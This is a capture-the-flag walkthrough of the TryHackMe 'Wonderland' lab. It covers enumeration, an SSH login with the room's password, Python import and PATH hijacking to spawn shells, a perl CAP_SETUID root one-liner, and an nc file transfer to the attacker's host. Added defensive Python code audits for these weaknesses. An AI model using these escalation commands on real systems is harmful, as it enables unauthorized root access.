# Wonderland

**Room Link:** <https://tryhackme.com/room/wonderland>

## Initial Scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FCQdC6p3LM0XpfSfJoa87%2Fimage.png?alt=media&#x26;token=48b28ace-d2b6-45a1-a86f-6e681ee53136" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXkPHBUC0D0u6i0PF2gWJ%2Fimage.png?alt=media&#x26;token=68ab4615-4ab1-442c-86c4-0281a1504591" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FklVUZi0rHj9YQKYwCldL%2Fimage.png?alt=media&#x26;token=b3a461b3-dba1-43e9-86ce-22f91f67ad2c" alt=""><figcaption></figcaption></figure>

I can see in the browser that I'm on the right track.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZ2J1ddPIqVHGGC4rcR1e%2Fimage.png?alt=media&#x26;token=4a23b3e6-8fc6-4bd8-b057-a934ed68a380" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/r/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsW2hPr5P7qRQ5aAYRo94%2Fimage.png?alt=media&#x26;token=8a6a2598-e05f-4741-9a74-ac757164b54a" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/r/a -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

After a few letters I was able to just guess the word it's spelling out.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F0VNpWbJMSboCyT47ay73%2Fimage.png?alt=media&#x26;token=33e7f34e-7092-449f-861b-3e31fa4b3864" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FfurVCzVQYSOjfFbBrcNU%2Fimage.png?alt=media&#x26;token=02077f95-29f9-4afc-ba1d-166047a56f8a" alt=""><figcaption></figcaption></figure>

## TCP/22 - SSH

**Kali**

```
ssh alice@$VICTIM
# Password: HowDothTheLittleCrocodileImproveHisShiningTail
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsOwRPmgyA3HzlA9Mp5zc%2Fimage.png?alt=media&#x26;token=d2ac1f3a-c0ee-47ea-8f33-dc4499940397" alt=""><figcaption></figcaption></figure>

## Lateral Movement - Abusing Library path

**Victim**

```
sudo -l
cat /home/alice/walrus_and_the_carpenter.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7ZiRX3v1n3egBkDj2TmV%2Fimage.png?alt=media&#x26;token=e8216e6a-d82e-4e16-8a43-a30b6f8be816" alt=""><figcaption></figcaption></figure>

The first command below prints Python's module search path (`sys.path`). The first entry it tries is the current directory, so we can create our own `random.py` there and put anything we want in it; it is found before the standard-library module.

**Victim**

```
python3 -c 'import sys; print (sys.path)'
locate random.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F5onA3Ri4kuxUhGQd4Ct3%2Fimage.png?alt=media&#x26;token=39ef6be2-c63a-4c69-9651-07a83c25db6e" alt=""><figcaption></figcaption></figure>

**Victim**

```
echo 'import os' > random.py
echo 'os.system("/bin/bash")' >> random.py
cat random.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FJbGvRQclMH4IRqWvtfeG%2Fimage.png?alt=media&#x26;token=4a87c24a-9166-4732-a7de-06f06bd6e90b" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPfD8ZsQUoqGgl7xPqj4q%2Fimage.png?alt=media&#x26;token=b6f8303c-1ddd-4d6a-a07e-2885c4350325" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPWpZNeKgWmXB2QV2g7jW%2Fimage.png?alt=media&#x26;token=35de81cd-d0ee-440e-aacb-6224c70d4586" alt=""><figcaption></figcaption></figure>
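The same condition seen from the defender's side, as an added example that is not part of the original walkthrough: before allowing a Python script in a sudoers rule, check who can write to its directory and which of its imports would be satisfied by a file sitting next to it. The function names, the `poem.py` file name and the temporary layout are constructed for illustration.

```python
import ast
import stat
import sys
import tempfile
from pathlib import Path


def top_level_imports(script):
    """Top-level module names the script imports (absolute imports only)."""
    names = set()
    for node in ast.walk(ast.parse(Path(script).read_text())):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def audit_script(script):
    """Describe how the script's own directory influences its imports."""
    script_dir = Path(script).resolve().parent
    info = script_dir.stat()
    local = sorted(
        name for name in top_level_imports(script)
        # Built-in modules are resolved before sys.path and cannot be shadowed.
        if name not in sys.builtin_module_names
        and ((script_dir / f"{name}.py").is_file()
             or (script_dir / name / "__init__.py").is_file())
    )
    return {
        "dir_owner_uid": info.st_uid,  # anyone but root here is a finding
        "dir_world_writable": bool(info.st_mode & stat.S_IWOTH),
        "resolved_from_script_dir": local,
    }


def demo():
    # Constructed layout: a script that imports random, beside a local random.py.
    with tempfile.TemporaryDirectory() as home:
        script = Path(home, "poem.py")
        script.write_text("import random\nimport os.path\nprint(random.choice('ab'))\n")
        Path(home, "random.py").write_text("# local file shadowing the stdlib module\n")
        return audit_script(script)
```

Keeping the script in a root-owned directory, or having the sudoers rule invoke the interpreter with `-I` (isolated mode, which leaves the script's directory out of `sys.path`), removes the condition.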

## Lateral Movement - Abusing Paths

**Kali(receiving)**

```
nc -l -p 1234 > teaParty
```

**Victim(sending)**

```
nc -w 3 $KALI 1234 < teaParty
```

### Ghidra

I opened the file in Ghidra and can see that the program runs the `date` command, whose output we see when we run the program. Note that `date` is called without its full path, so if we put another directory earlier in our `PATH`, our own `date` command runs instead.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7bJUuA7glAEtO92p0801%2Fimage.png?alt=media&#x26;token=f88aa3ab-5ffe-4e0d-8d00-fcb3d06d6483" alt=""><figcaption></figcaption></figure>

I added /tmp to my PATH.

**Victim(rabbit)**

```
echo $PATH
export PATH=/tmp:$PATH
echo $PATH
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNz4ycqBZ309Ks0Sm9Wsq%2Fimage.png?alt=media&#x26;token=815a713a-421d-4e03-bc1e-793fe2534e81" alt=""><figcaption></figcaption></figure>

I'm not the hatter

**Victim(rabbit)**

```
cd /tmp
echo '#!/bin/bash' > date
echo '/bin/bash' >> date
chmod +x date
cat date
/home/rabbit/teaParty 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fc2qHcM2BLG6jp1cwhFGY%2Fimage.png?alt=media&#x26;token=bbfa9815-5f9d-4973-acf9-6ad6034a2d4c" alt=""><figcaption></figcaption></figure>
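What the Ghidra finding means for whoever maintains such a binary, as an added example that is not part of the original walkthrough: list the command words in a shell string that will be looked up through the caller's `PATH`, and map each one to an absolute path taken only from trusted directories. The command line, function names and temporary directory are constructed for illustration; variable assignments placed before a command are not handled.

```python
import os
import shlex
import shutil
import tempfile

SHELL_OPERATORS = {"&&", "||", ";", "|", "&", "("}
# Builtins are resolved by the shell itself, not through PATH (partial list).
SHELL_BUILTINS = {"cd", "echo", "exit", "export", "test", "[", "true", "false"}


def bare_commands(cmdline):
    """Command words in a shell line that the shell will look up via PATH."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    found, at_command = [], True
    for token in lexer:
        if token in SHELL_OPERATORS:
            at_command = True          # next word starts a new command
        elif at_command:
            if "/" not in token and token not in SHELL_BUILTINS:
                found.append(token)
            at_command = False         # following words are arguments
    return found


def pin_commands(cmdline, trusted_dirs):
    """Map each bare command to its absolute path inside trusted_dirs only."""
    trusted = os.pathsep.join(trusted_dirs)
    return {cmd: shutil.which(cmd, path=trusted) for cmd in bare_commands(cmdline)}


def demo():
    # Constructed sample, not the string recovered from teaParty.
    cmdline = "/bin/echo -n 'Time is ' && date --date='next hour' -R"
    with tempfile.TemporaryDirectory() as trusted_bin:
        fake = os.path.join(trusted_bin, "date")  # stand-in for the real date
        with open(fake, "w") as handle:
            handle.write("#!/bin/sh\n")
        os.chmod(fake, 0o755)
        pinned = pin_commands(cmdline, [trusted_bin])
        return bare_commands(cmdline), pinned == {"date": fake}
```

Every name this reports should be replaced with its absolute path in the source, or the program should set `PATH` to a fixed value before it starts a shell.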

## Privilege Escalation

**Victim(hatter)**

We can follow the Capabilities section of the GTFOBins entry linked below, but only the last command is needed because `CAP_SETUID` is already set on perl.

**Exploit:** <https://gtfobins.github.io/gtfobins/perl/>

```
getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FwFiyKTEBqPxc11RlGAAp%2Fimage.png?alt=media&#x26;token=b2fe6916-8a3a-41e9-b5eb-67a39d696324" alt=""><figcaption></figcaption></figure>
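For routine auditing, the `getcap -r /` listing can be checked automatically. The following is an added example, not part of the original walkthrough: it parses both line layouts that different libcap versions print and flags files holding a root-equivalent capability, marking script interpreters separately. The sample lines are constructed, and the capability and interpreter lists are a non-exhaustive selection.

```python
import re

# Capabilities that give a direct route to full root (non-exhaustive selection).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}
INTERPRETER = re.compile(r"/(perl|python|ruby|php|node|lua)[\d.]*$")
# Older libcap prints "path = caps+flags", newer prints "path caps=flags".
LINE = re.compile(r"^(?P<path>/.*?)(?: =)? (?P<caps>\S+[+=][eip]*)$")

# Constructed sample, not the room's actual output.
SAMPLE = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip
/usr/bin/ping cap_net_raw=ep
"""


def parse_getcap(output):
    """Return (path, set of capability names, flag letters) per parsed line."""
    entries = []
    for line in output.splitlines():
        match = LINE.match(line.strip())
        if not match:
            continue
        names, flags = re.split(r"[+=]", match["caps"], maxsplit=1)
        entries.append((match["path"], set(names.split(",")), flags))
    return entries


def risky_capabilities(output):
    """Files whose permitted set holds a root-equivalent capability."""
    findings = []
    for path, caps, flags in parse_getcap(output):
        hits = sorted(caps & ROOT_EQUIVALENT)
        if hits and "p" in flags:
            findings.append((path, hits, bool(INTERPRETER.search(path))))
    return findings
```

A finding on an interpreter is the most urgent kind, since any user who may execute it can run arbitrary code with that capability; `setcap -r <file>` removes the capability set.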

